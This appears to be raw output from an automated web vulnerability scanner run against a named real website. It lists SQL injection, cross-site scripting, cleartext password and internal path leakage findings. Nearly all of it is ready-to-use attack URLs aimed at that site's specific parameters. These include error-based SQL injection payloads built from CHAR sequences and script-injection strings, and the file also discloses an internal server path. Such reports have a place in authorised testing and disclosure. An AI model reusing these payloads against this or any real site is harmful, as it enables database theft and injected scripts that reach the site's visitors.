- SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- |||
- [High Possibility] SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema=%27
- http://www.czechnationalteam.cz/?strana=%27
- http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27
- http://www.czechnationalteam.cz/search.php?rskolik=%27&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=%27&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/index.php?strana=%27
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rskde
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rstema
- Parameter Type: Post
- Attack Pattern: %27
- |||
- Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- http://www.czechnationalteam.cz/search.php?rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x0001A9)</script>
- http://www.czechnationalteam.cz/view.php?cisloclanku='"--></style></script><script>alert(0x0001F0)</script>
- http://www.czechnationalteam.cz/view.php?nazevclanku=predstavujeme-distribuovane-vypocty-dc&cisloclanku='"--></style></script><script>alert(0x0001FC)</script>
- http://www.czechnationalteam.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x00022C)</script>
- http://www.czechnationalteam.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x000292)</script>
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rstext
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002BE)</script>
- http://www.czechnationalteam.cz/download.php?sekce=6'"--></style></script><script>alert(0x0002C5)</script>
- http://www.czechnationalteam.cz/download.php?akce=detail&id_detail=80&sekce='"--></style></script><script>alert(0x0002ED)</script>
- http://www.czechnationalteam.cz/view.php
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: <script>ns(0x00032C)</script>
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rsrazeni
- Parameter Type: Post
- Attack Pattern: "><script>alert(9)</script>
- http://www.czechnationalteam.cz/search.php
- Parameter Name: rstema
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00033C)</script>
- http://www.czechnationalteam.cz/rservice.php
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00034E)</script>
- http://www.czechnationalteam.cz/search.php?rskolik='"--></style></script><script>alert(0x000355)</script>&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- Parameter Name: rskolik
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000355)</script>
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext='"--></style></script><script>alert(0x00037B)</script>&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema='"--></style></script><script>alert(0x00039E)</script>&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde='"--></style></script><script>alert(0x0003A1)</script>&rsvelikost=sab&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab'"--></style></script><script>alert(0x0003B4)</script>&rsrazeni=datum_90
- http://www.czechnationalteam.cz/search.php?rskolik=15&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni='"--></style></script><script>alert(0x0003B5)</script>
- http://www.czechnationalteam.cz/readers.php
- Parameter Name: rjmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0003F8)</script>
- |||
- Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Vulnerable URL : http://www.czechnationalteam.cz/readers.php?akce=new
- Form target action: readers.php
- |||
- [Possible] Internal Path Leakage (*nix)
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- http://www.czechnationalteam.cz/?strana=%27
- Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- http://www.czechnationalteam.cz/search.php?rskolik=%27&rskolikata=2&rstext=all-phpRS-all&rsautor=nic&rstema=56&rskde=vse&rsvelikost=sab&rsrazeni=datum_90
- Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
- Parameter Name: rskolik
- Parameter Type: Querystring
- Attack Pattern: %27
- http://www.czechnationalteam.cz/index.php?strana=%27
- Identified Internal Path(s): /var/www/web5/czechnationalteam.cz/czechnationalteam.cz/db/phprs_sql_to_mysql.php
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27